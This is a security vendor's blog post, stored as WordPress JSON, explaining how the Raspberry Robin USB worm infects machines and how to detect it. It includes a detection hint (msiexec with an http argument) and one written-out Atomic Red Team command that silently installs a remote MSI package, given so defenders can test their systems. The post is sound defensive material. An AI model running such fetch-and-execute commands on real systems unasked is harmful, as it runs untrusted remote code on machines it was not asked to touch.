{"id":7065,"date":"2023-09-19T09:51:13","date_gmt":"2023-09-19T09:51:13","guid":{"rendered":"https:\/\/fortgale.com\/blog\/?p=7065"},"modified":"2023-09-21T16:45:56","modified_gmt":"2023-09-21T16:45:56","slug":"raspberry-robin-how-to-defend","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/raspberry-robin-how-to-defend\/","title":{"rendered":"Raspberry Robin: How to defend"},"content":{"rendered":"\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" width=\"467\" height=\"466\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale.png\" alt=\"\" class=\"wp-image-4811 size-full\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale.png 467w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale-300x300.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/raspberryrobinfortgale-150x150.png 150w\" sizes=\"(max-width: 467px) 100vw, 467px\" loading=\"lazy\" \/><\/figure><div class=\"wp-block-media-text__content\">\n<p>In May 2022, a new, particularly evasive Worm was observed for the first time, spreading in private and corporate networks through <strong>compromised USB sticks.<br><\/strong>This new Worm has been given the name &#8220;<strong><em>Raspberry Robin<\/em><\/strong>&#8220;.<\/p>\n<\/div><\/div>\n\n\n\n<p>Worms that propagate through USB devices are certainly not new threats and very often, since they are old malware, command and control infrastructures are<em> offline.<\/em><\/p>\n\n\n\n<p>Raspberry Robin, on the other hand, is a real threat to the security of companies as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>it is actively run by criminals;<\/li>\n\n\n\n<li>uses a sophisticated chain of compromise for defense evasion; <\/li>\n\n\n\n<li>it is used as a bridge for <strong>Ransomware-type attacks <\/strong>(<a href=\"https:\/\/www.microsoft.com\/security\/blog\/2022\/05\/09\/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself\/#DEV-0206-DEV-0243\" target=\"_blank\" rel=\"noreferrer noopener\"><em>fonte<\/em><\/a>);<\/li>\n\n\n\n<li>uses compromised <strong>QNAP<\/strong> systems such as <strong>C2 infrastructure <\/strong>and <strong>TOR <\/strong>(The Onion Routing) network.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-preventing-a-compromission\">Preventing a Compromission<\/h2>\n\n\n\n<p>As previously mentioned, Malware enters the infrastructure via an <strong>initial compromise<\/strong> of a Workstation via a <strong>USB device.<\/strong><\/p>\n\n\n\n<div class=\"wp-block-media-text alignwide has-media-on-the-right is-stacked-on-mobile\" style=\"grid-template-columns:auto 15%\"><div class=\"wp-block-media-text__content\">\n<p><strong>When opening the USB device, the victim is shown a classic Windows connection:<\/strong><\/p>\n<\/div><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" width=\"156\" height=\"169\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-1.png\" alt=\"Link per avvio compromissione Raspberry Robin\" class=\"wp-image-4776 size-full\" loading=\"lazy\" \/><\/figure><\/div>\n\n\n\n<p>Double clicking on the latter starts the chain of compromise by showing the correct opening of a destination folder on the screen while simultaneously launching a series of malicious commands:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"975\" height=\"211\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10.png\" alt=\"Cosa succede durante l'avvio della catena di compromissione del malware Raspberry Robin\" class=\"wp-image-4807\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10.png 975w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10-300x65.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-10-768x166.png 768w\" sizes=\"(max-width: 975px) 100vw, 975px\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>The first malicious command has the <em><strong>Downloader<\/strong><\/em> function and is used to actually download the <em>Raspberry Robin<\/em> malware:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1024x32.png\" alt=\"Evidenza tecnica dell'esecuzione di comandi malevoli da cui proteggersi\" class=\"wp-image-4779\" style=\"width:840px;height:26px\" width=\"840\" height=\"26\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1024x32.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-300x9.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-768x24.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3-1536x48.png 1536w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-3.png 1808w\" sizes=\"(max-width: 840px) 100vw, 840px\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>A peculiarity of the Malware is the use of previously compromised <strong>QNAP servers<\/strong> in order to distribute the final malicious payload.<\/p>\n\n\n\n<p>At this point, the download of the final payload completes the compromise phase and starts communications with the command and control server typically on the<strong> TOR <\/strong>(<em>The Onion Routing<\/em>) network:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"746\" height=\"189\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4.png\" alt=\"Grafico semplificato della catena di compromissione Raspberry Robin\" class=\"wp-image-4780\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4.png 746w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-4-300x76.png 300w\" sizes=\"(max-width: 746px) 100vw, 746px\" loading=\"lazy\" \/><figcaption class=\"wp-element-caption\">Compromission chain &#8211; <a href=\"https:\/\/blogs.cisco.com\/security\/raspberry-robin-highly-evasive-worm-spreads-over-external-disks\" target=\"_blank\" rel=\"noreferrer noopener\">fonte<\/a><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Threat Detection Methods<\/h2>\n\n\n\n<p>Defending an infrastructure from a Raspberry Robin malware compromise can be performed on several levels.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Endpoint Security<\/h3>\n\n\n\n<p>With visibility into all enterprise systems, you can identify this type of compromise by detecting the execution of suspicious commands. In this case, the identification of the <strong>msiexec<\/strong> process associated with the presence of the <strong>http<\/strong> keyword could be a first alarm bell<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Testing defence:<\/h4>\n\n\n\n<p>E&#8217; possibile simulare l&#8217;attivit\u00e0 offensiva, per poter testare l&#8217;effettiva capacit\u00e0 difensiva dei sistemi per questo genere di compromissione, lanciando il comando (<a href=\"https:\/\/github.com\/redcanaryco\/atomic-red-team\/blob\/master\/atomics\/T1218.007\/T1218.007.md#atomic-test-11---msiexecexe---execute-remote-msi-file\" target=\"_blank\" rel=\"noreferrer noopener\">Test Atomic Red Team<\/a>):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msiexec.exe \/q \/i \"https:\/\/github.com\/redcanaryco\/atomic-red-team\/raw\/master\/atomics\/T1218.007\/src\/T1218.007_JScript.msi\"\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Network and Intelligence Feed<\/h3>\n\n\n\n<p>It is possible to identify a compromise from Raspberry Robin malware and similar, using the information acquired from the company&#8217;s network, following two different approaches:<\/p>\n\n\n\n<p><strong>Use of Intrusion Detection System types::<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\" id=\"block-01315421-64a0-452d-871a-344848c202d0\">\n<li>in this case, if correctly configured, the IDS system should have rules for identifying malicious traffic by sniffing communications with the C2.<\/li>\n<\/ul>\n\n\n\n<p><strong>Use of Intelligence Feed:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>leveraging information from intelligence feeds regarding malware and offensive systems. In fact, it is enough to correlate the information of IP addresses and domains to identify anomalous traffic!<\/li>\n<\/ul>\n\n\n\n<p><strong>Attention! In this case, from a defensive point of view, the identification of the threat occurs post-compromise! The system is already compromised and there may be impacts on the victim system&#8217;s information.<\/strong><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Fortgale Defence<\/h2>\n\n\n\n<p>Fortgale takes care of securing companies from these types of cyber threats and compromises! From defense against Malware attacks (Ransomware, Worms, Trojans and Spyware) to compromises of perimeter systems through application and system vulnerabilities.<\/p>\n\n\n\n<p>We identify attackers from the first moment they try to take their first steps into the Company&#8217;s systems and networks.<\/p>\n\n\n\n<p>With specialist services designed for different company characteristics, we can intervene on different aspects of defence.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Contact: info@fortgale.com<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fortgale.com\/mdr\/\"><img decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-1024x428.png\" alt=\"La lista dei principali servizi Difensifi di Fortgale\" class=\"wp-image-4784\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-1024x428.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-300x125.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6-768x321.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-6.png 1446w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/fortgale.com\/xdr\/\"><img decoding=\"async\" width=\"1024\" height=\"390\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-1024x390.png\" alt=\"Le statistiche delle principali attivit\u00e0 svolte da Fortgale\" class=\"wp-image-4785\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-1024x390.png 1024w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-300x114.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7-768x292.png 768w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-7.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/fortgale.com\/clienti\/\"><img decoding=\"async\" width=\"980\" height=\"488\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8.png\" alt=\"I settori in cui operano i clienti Fortgale\" class=\"wp-image-4786\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8.png 980w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8-300x149.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2022\/09\/image-8-768x382.png 768w\" sizes=\"(max-width: 980px) 100vw, 980px\" loading=\"lazy\" \/><\/a><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In May 2022, a new, particularly evasive Worm was observed for the first time, spreading in private and corporate networks through compromised USB sticks.This new Worm has been given the name &#8220;Raspberry Robin&#8220;. Worms that propagate through USB devices are certainly not new threats and very often, since they are old malware, command and control [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":5246,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[],"class_list":["post-7065","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=7065"}],"version-history":[{"count":5,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065\/revisions"}],"predecessor-version":[{"id":7076,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/7065\/revisions\/7076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/5246"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=7065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=7065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=7065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}